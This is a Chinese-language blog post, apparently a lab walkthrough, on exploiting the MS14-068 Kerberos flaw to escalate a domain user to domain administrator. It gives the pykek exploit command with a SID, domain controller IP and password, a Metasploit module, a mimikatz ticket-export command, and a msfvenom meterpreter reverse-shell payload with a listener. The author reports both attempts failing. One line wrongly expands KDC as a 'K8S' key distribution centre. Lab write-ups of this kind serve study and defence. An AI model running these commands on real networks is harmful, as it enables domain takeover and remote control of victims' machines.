![ffa4eec16d7372f308e732bb526e2a5a.png](https://i-blog.csdnimg.cn/blog_migrate/966b49f1a20633f20988b3b9012b22a9.jpeg)
2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响。该漏洞允许攻击者将域内任意用户权限,提升到域管理员级别。如果想利用这个漏洞,把自己变成域控管理员,只需要知道:
- 域内任意用户名
- SID
- 密码
- 域控IP地址
![1a571258319c5c3240ca99a60b682838.png](https://i-blog.csdnimg.cn/blog_migrate/f814be9b5da7e78e703c808d8e3474cd.jpeg)
反正我觉得这本书上,对这一块讲的不咋滴,至少我没看到特权体现在哪?不知道大家怎么看?不过放心,这个知名的漏洞,肯定还会有后续的实验的~
漏洞原理:
- 用户向KDC(K8S秘钥分发中心)申请TGT(身份凭证)时
- 用户可以伪造自己的票据
- 如果票据声明自己有域管理员权限
- 而KDC在处理该票据时未验证票据的签名
- 那么返回给用户的TGT就拥有域管理员权限
- 用户将有域管理员权限的TGT发送到TGS(票据授权服务)
- 就会获得特权ST(服务票据)
- 于是可以访问域内的一切资源
步骤一:查看域控制器的补丁
- 没有KB3011780补丁
- 存在CVE-2014-6324(MS14-068漏洞)
![15655fdd93f0986b88ef966efb931686.png](https://i-blog.csdnimg.cn/blog_migrate/ab199fe720b2f83270267de17212698c.png)
步骤二:查看用户的SID
- ailx32:SID=
S-1-5-21-1632228486-913648825-264583114-1001
- Administrator:SID=
S-1-5-21-1632228486-913648825-264583114-500
![b39149d883362417f445bdb1c709fd79.png](https://i-blog.csdnimg.cn/blog_migrate/19ac0d4b8f3d36f24c6058aae80209a7.png)
步骤三:克隆pykek
- 下载地址:github项目
- ms14-068.py是pykek工具包中的漏洞利用脚本
![b52cac33e7454c06051452f29ff36336.png](https://i-blog.csdnimg.cn/blog_migrate/a6be28e1a85563a9869af5ae5641648a.png)
步骤四:生成高权限票据
- 普通域用户名:
ailx32
- 域:
hackbiji.top
- 普通SID:
S-1-5-21-1632228486-913648825-264583114-1001
- 域控IP:
192.168.160.143
- 普通账号密码:
W2ngluoanquan
python ms14-068.py -u ailx32@hackbiji.top -s S-1-5-21-1632228486-913648825-264583114-1001 -d 192.168.160.143 -p W2ngluoanquan
![10f677246d1a110124ee5aba3af23070.png](https://i-blog.csdnimg.cn/blog_migrate/3e4635000ed2c150568ecd119a3b9990.png)
步骤五:验证权限
- 低权限的票据,无效
![5e455c3226235feef6f8e75ed7fb4ec2.png](https://i-blog.csdnimg.cn/blog_migrate/2cce45642ca721e066c5a7a9024d95b3.jpeg)
- 高权限票据,无效
![f2b4f65d4a526e8fe871f72a0647f3c6.png](https://i-blog.csdnimg.cn/blog_migrate/c88954019ae5e9853cf3e20313010f87.jpeg)
- 最后结论就是,我票据确实导入了呀
- 但是它死活不能用普通身份获得IPC通道
![d2347e500b1a17a79607c072f1b8cc82.png](https://i-blog.csdnimg.cn/blog_migrate/af0833a9ac072047c48fb2fd179ccf83.png)
- 如果知道用户名和密码,那么是可以直接获得IPC通道的呀
- 何必搞的那么复杂呢?
![7e0312558febba4d3e87416e80fdd606.png](https://i-blog.csdnimg.cn/blog_migrate/053797c20e7f3affcae5e7754db4140a.png)
- 更可气的是,我啥也没干,通过管理员权限运行cmd,就已经拿到IPC权限了
- 蜜汁操作
![9d418421bb955e8fd466e5d87b59cc13.png](https://i-blog.csdnimg.cn/blog_migrate/1784466d1c1620554614d58fe634fc72.png)
后续实验来了:抓紧时间收藏~
一、在metasploit中实验
- 利用ms14-068漏洞
- 生成
20200926141524_default_192.168.160.143_windows.kerberos_231623.bin
- 需要通过mimikatz进行一下格式转换
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
![a3df98479267eb1df6d707b1b412d697.png](https://i-blog.csdnimg.cn/blog_migrate/9918bb63e234dbf3b80f071ae57a5b29.png)
二、在mimikatz中进行格式转换
- 获得
kirbi
格式的文件 - 留着后面提权用
kerberos::clist "20200926141524_default_192.168.160.143_windows.kerberos_231623.bin" /export
![936c68958f4ee70de92a21f1b1868560.png](https://i-blog.csdnimg.cn/blog_migrate/5dea511cfad29d58c6ecaf6f84dd5ac5.jpeg)
三、生成一个反向shell的木马
- 获得
hack.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.140 LPORT=5555 -f exe > hack.exe
![2d867e9fbca152d6ab83809aa386777a.png](https://i-blog.csdnimg.cn/blog_migrate/0559ea5143b467f8a70f2ed64365026b.png)
四、监听木马的来信
- 通过metasploit监听5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
![008b7dde1a95ca4c04bf79911002308e.png](https://i-blog.csdnimg.cn/blog_migrate/e43176659925aad14a8e188fdd8dda53.png)
五、鱼儿上钩
- 获得普通权限
hackbijiailx32
![53656c1d00cd9e2bda3b74143b575741.png](https://i-blog.csdnimg.cn/blog_migrate/f715e405bc8dfef4f4cd5ed1422f4d0a.png)
六、导入票据
- 狗屁,报错(Kerberos ticket application failed.)
- 骗子
![a6d726220cb99890f30ec9833cd13b55.png](https://i-blog.csdnimg.cn/blog_migrate/177e0b4eb2ccb7d43fccfb25297fd615.jpeg)
本篇完~